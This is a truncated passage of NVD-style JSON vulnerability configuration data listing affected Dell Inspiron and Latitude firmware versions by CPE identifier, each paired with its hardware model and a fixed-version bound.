"cpe:2.3:h:dell:inspiron_24_5410_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_24_5411_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_24_5411_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_24_5420_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_24_5420_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_27_7710_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_27_7710_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_27_7720_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_27_7720_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_3020_desktop_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_3020_desktop:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_3020_small_desktop_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_3020_small_desktop:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_3030s_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.3.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_3030s:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_3480_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_3480:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_3493_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_3493:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_3501_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_3501:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_3580_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_3580:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_3593_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_3593:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_3793_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_3793:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_3880_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_3880:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_3881_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_3881:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_3891_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_3891:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_3910_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_3910:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_5301_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_5301:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_5400_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_5400:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_5401_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_5401:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_5401_aio_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_5401_aio:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_5402_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_5402:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_5406_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_5406_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_5409_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_5409:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_5410_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_5410:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_5493_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_5493:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_5502_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_5502:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_5509_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_5509:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_5593_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_5593:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_7300_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_7300:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_7306_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_7306_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_7400_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_7400:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_7490_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_7490:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_7500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_7500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_7501_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_7501:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_7506_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_7506_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_7700_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_7700_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_7706_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_7706_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_12_rugged_extreme_7214_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.45.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_12_rugged_extreme_7214:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3380_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3380:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3120_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.24.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3120:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3140_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3140:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3180_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3180:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3189_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3189:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3190_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.33.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3190:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3190_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.33.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3190_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3300_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3300:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3301_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3301:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3310_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.24.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3310:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3310_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3310_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3320_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3320:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3340_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3340:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3390_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3390_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3400_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3400:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3410_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3410:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.35.0", "cpe_name" : 